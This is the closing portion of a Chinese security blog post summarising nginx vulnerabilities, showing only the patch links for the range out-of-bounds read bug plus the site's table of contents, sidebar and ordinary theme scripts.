<h2 id="漏洞修复-4"><a href="#漏洞修复-4" class="headerlink" title="漏洞修复"></a><strong>漏洞修复</strong></h2><p>官方补丁如下： </p>
<p><a href="http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html" target="_blank" rel="noopener">http://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html</a> </p>
<p><a href="http://nginx.org/download/patch.2017.ranges.txt" target="_blank" rel="noopener">http://nginx.org/download/patch.2017.ranges.txt</a> </p>

      
    </div>
    
    
    

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
  <span>文章作者:</span><a href="/" title="访问 CyzCc 的个人博客">CyzCc</a><br>
  <span>最后更新:</span>2020年12月07日 15:12:10<br>
  <span>原始链接:</span><a href="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/" title="nginx中间件漏洞总结">https://cyzcc.vip/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/</a><br>
  <span>版权声明:</span>转载请注明出处！<br>  
</div>

      
</div>
	
	

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>您的支持就是我的动力！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="CyzCc Thanks"/>
        <p>Thanks</p>
      </div>
    

    

    

  </div>
</div>

      </div>
    

    
      <div>
        
          <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------　　　　本文结束　<i class="fa fa-heart"></i>　感谢您的阅读　　　　-------------</div>
    
</div>

        
      </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/" rel="tag"><i class="fa fa-tag"></i> 中间件漏洞</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/14/buu-web-7/" rel="next" title="BUU-web七">
                <i class="fa fa-chevron-left"></i> BUU-web七
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/07/23/apache%E4%B8%AD%E9%97%B4%E4%BB%B6/" rel="prev" title="apache中间件漏洞总结">
                apache中间件漏洞总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.gif"
                alt="CyzCc" />
            
              <p class="site-author-name" itemprop="name">CyzCc</p>
              <p class="site-description motion-element" itemprop="description">卍~~黑玫瑰将再次绽放~~卐</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">73</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="1643277253@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://www.heibanke.com/lesson/crawler_ex00/" target="_blank" title="爬虫闯关">
                      
                        <i class="fa fa-fw fa-globe"></i>爬虫闯关</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://adworld.xctf.org.cn/" target="_blank" title="攻防世界">
                      
                        <i class="fa fa-fw fa-globe"></i>攻防世界</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://buuoj.cn/" target="_blank" title="BUUCTF">
                      
                        <i class="fa fa-fw fa-globe"></i>BUUCTF</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://ctf.bugku.com/" target="_blank" title="BUGKU">
                      
                        <i class="fa fa-fw fa-globe"></i>BUGKU</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://xss-quiz.int21h.jp/" target="_blank" title="XSS-challenges">
                      
                        <i class="fa fa-fw fa-globe"></i>XSS-challenges</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://ctf.hutc.xyz/" target="_blank" title="HUCTF">
                      
                        <i class="fa fa-fw fa-globe"></i>HUCTF</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://paper.seebug.org/" target="_blank" title="Paper">
                      
                        <i class="fa fa-fw fa-globe"></i>Paper</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://hkyx.myhack58.com/" target="_blank" title="黑客闯关游戏">
                      
                        <i class="fa fa-fw fa-globe"></i>黑客闯关游戏</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.freebuf.com/" target="_blank" title="FreeBuf">
                      
                        <i class="fa fa-fw fa-globe"></i>FreeBuf</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://blog.csdn.net/" target="_blank" title="CSDN">
                      
                        <i class="fa fa-fw fa-globe"></i>CSDN</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://wiki.0-sec.org/#/dashboard" target="_blank" title="Zero Security">
                      
                        <i class="fa fa-fw fa-globe"></i>Zero Security</a>
                  </span>
                
            </div>
          

          
          

          
          

          <div id="days"></div>
<script>
function show_date_time(){
window.setTimeout("show_date_time()", 1000);
BirthDay=new Date("10/30/2019 15:13:14");
today=new Date();
timeold=(today.getTime()-BirthDay.getTime());
sectimeold=timeold/1000
secondsold=Math.floor(sectimeold);
msPerDay=24*60*60*1000
e_daysold=timeold/msPerDay
daysold=Math.floor(e_daysold);
e_hrsold=(e_daysold-daysold)*24;
hrsold=setzero(Math.floor(e_hrsold));
e_minsold=(e_hrsold-hrsold)*60;
minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
seconds=setzero(Math.floor((e_minsold-minsold)*60));
document.getElementById('days').innerHTML="已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分 "+seconds+" 秒";
}
function setzero(i){
if (i<10)
{i="0" + i};
return i;
}
show_date_time();
</script>

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#空字节代码执行漏洞"><span class="nav-number">1.</span> <span class="nav-text">空字节代码执行漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#产生原因"><span class="nav-number">1.1.</span> <span class="nav-text">产生原因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#影响版本"><span class="nav-number">1.2.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞危害"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-number">1.4.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修复"><span class="nav-number">1.5.</span> <span class="nav-text">漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#解析漏洞"><span class="nav-number">2.</span> <span class="nav-text">解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#产生原因-1"><span class="nav-number">2.1.</span> <span class="nav-text">产生原因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞危害-1"><span class="nav-number">2.2.</span> <span class="nav-text">漏洞危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现-1"><span class="nav-number">2.3.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修复-1"><span class="nav-number">2.4.</span> <span class="nav-text">漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件名逻辑漏洞"><span class="nav-number">3.</span> <span class="nav-text">文件名逻辑漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞产生"><span class="nav-number">3.1.</span> <span class="nav-text">漏洞产生</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现-2"><span class="nav-number">3.2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修复-2"><span class="nav-number">3.3.</span> <span class="nav-text">漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#目录穿越漏洞"><span class="nav-number">4.</span> <span class="nav-text">目录穿越漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞产生-1"><span class="nav-number">4.1.</span> <span class="nav-text">漏洞产生</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞危害-2"><span class="nav-number">4.2.</span> <span class="nav-text">漏洞危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现-3"><span class="nav-number">4.3.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修复-3"><span class="nav-number">4.4.</span> <span class="nav-text">漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CRLF注入漏洞"><span class="nav-number">5.</span> <span class="nav-text">CRLF注入漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞产生-2"><span class="nav-number">5.1.</span> <span class="nav-text">漏洞产生</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞危害-3"><span class="nav-number">5.2.</span> <span class="nav-text">漏洞危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现-4"><span class="nav-number">5.3.</span> <span class="nav-text">漏洞复现</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#越界读取缓存漏洞"><span class="nav-number">6.</span> <span class="nav-text">越界读取缓存漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞产生-3"><span class="nav-number">6.1.</span> <span class="nav-text">漏洞产生</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现-5"><span class="nav-number">6.2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修复-4"><span class="nav-number">6.3.</span> <span class="nav-text">漏洞修复</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">cyzCc</span>

 <!-- 
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">189.2k</span>
  

</div>

-->






<!-- 新增访客统计代码 -->
<!--<div class="busuanzi-count">
    <script async="" src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="site-uv">
      <i class="fa fa-user"></i>
      访问用户： <span class="busuanzi-value" id="busuanzi_value_site_uv"></span> 人
    </span>
    <div class="powered-by"></div>
    <span class="site-uv">
      <i class="fa fa-eye"></i>
      访问次数： <span class="busuanzi-value" id="busuanzi_value_site_pv"></span> 次
    </span>
    <!-- 博客字数统计 -->
    <span class="site-pv">
      <i class="fa fa-pencil"></i>
      博客全站共： <span class="post-count">189.2k</span> 字
    </span>
	  <a href="http://www.beian.miit.gov.cn" target="_blank" rel="noopener">蜀ICP备20017267号</a>
</div>
<!-- 新增访客统计代码 END-->

        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("TSaUMM9qwI423iWuECxQWDDh-gzGzoHsz", "2DucY6TQAx8iNNnjFYelMbXV");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  
  <script type="text/javascript" src="/js/src/exturl.js?v=5.1.4"></script>


  
  
 <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
 <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
 <script type="text/javascript" src="/js/src/fireworks.js"></script>


<div class="bg_content">
<canvas id="canvas"></canvas>
</div>
<!-- 雪花特效 -->
<!--<script type="text/javascript">

    document.write('<script type="text/javascript" src="/js/src/snow2.js"><\/script>');

</script>-->

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":100,"height":200},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/src/dynamic_bg.js"></script>